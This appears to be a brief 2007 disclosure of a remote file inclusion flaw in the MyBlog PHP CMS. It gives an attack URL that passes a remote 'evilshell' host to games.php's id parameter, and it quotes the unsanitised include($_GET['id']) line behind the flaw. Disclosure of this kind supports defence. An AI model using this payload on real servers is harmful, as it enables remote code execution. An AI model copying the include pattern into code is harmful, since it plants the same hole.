Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18716
HistoryDec 24, 2007 - 12:00 a.m.

My Blog Rfi

2007-12-2400:00:00
vulners.com
32

MyBlog CMS RFI

Aurthor: Beenu Arora
mail: [email protected]

Application:MyBlog: PHP and MySQL Blog/CMS software

                   RFI

1.http://localhost/games.php?id=http://evilshell

vulnerablity: include($_GET['id'] . ".php");

greetz : d3, baltazar , Zugzwang , Fuzion , Vivek

Site: www.darkc0de.com